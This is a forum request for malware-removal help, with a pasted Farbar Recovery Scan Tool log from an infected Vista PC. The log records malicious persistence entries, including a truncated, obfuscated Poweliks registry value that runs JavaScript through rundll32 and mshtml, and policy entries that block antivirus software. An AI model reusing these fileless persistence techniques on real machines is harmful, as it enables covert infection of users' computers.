jjoyner1985 Posted August 23, 2014

Good afternoon,

I have an infection on a friend's PC running Vista Home Premium 32-bit SP2 that is driving me to drink. I have tried to remove it myself using various tools but any progress I make is undone within minutes by this malware. So far, Combofix has listed a ZeroAccess rootkit that it has removed. MBAM has shown and allegedly removed 2 trojans. The first was a dropper.ed and agent.ed. The second one I don't remember the name of exactly. It was something along the lines of Milsap or some such.

Chrome-like browser windows appear on their own with an IP address as the URL (one of which is from Scranton, PA I found out). The IPs cycle through in this order: 206.51.231.110, 66.197.157.20, 184.173.181.55 and operate under a process known as browser.exe. Each Chrome-like window stays up for a few seconds until the "unresponsive page" warning appears and the browser closes. It is followed by another soon after. Chrome itself is not installed on this computer.

I followed the browser.exe process to the following directory: LocalLow/UIMobile/ValidatorVisual. Deleting either ValidatorVisual or UIMobile directories only fixes the issue until it regenerates. Upon deleting the UIMobile directory, the first file to return is titled JawaVinyl.pac, has a size of ~44,762KB, and is (given the extension) a proxy auto configuration file.

On the various scans that I've run, some have pointed out that the computer is configured to use a proxy of the 127.0.0.1 port 5555. Looking at the connection settings under Internet Options, the computer is not configured to automatically detect nor use a hard-coded proxy.

Per the sticky, here are the FRST.txt and Addition.txt logs. I have been working on this at work. So, any references to the proxy address of 192.168.0.101:3128 are legit, as that is my employer's CentOS web proxy.

Thanks in advance for your help.
FRST.txt

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 23-08-2014 16:54:35
Running from F:\
Platform: Microsoft® Windows Vista™ Home Premium Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgtray.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [irfuqApivh] => regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat"
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\MountPoints2: {a906d2bc-6084-11e3-9d8a-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableChangePassword] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\system: [DisableLockWorkstation] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-1001\...\MountPoints2: {0ae3004a-a5e2-11df-a1d1-00219b005b31} - H:\LaunchU3.exe -a
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [swg] => "C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe"
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-501\...\RunOnce: [spchecker] => C:\Program Files\AVG\AVG10\Notification\SPCheckerTE.exe [390472 2011-12-22] ()
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk * BootDefrag.exesasnative32

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
URLSearchHook: HKCU - (No Name) - {26842a09-ffa8-4e2c-ae12-0c80f01c3295} - No File
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3

FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-08-23] (Malwarebytes Corporation)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-08-23 16:54 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 16:16 - 2014-08-23 16:16 - 00009460 _____ () C:\ComboFix.txt
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:23 - 2014-08-23 11:25 - 00001106 _____ () C:\Users\savas.kyriakidis\Desktop\Live PC Help.lnk
2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
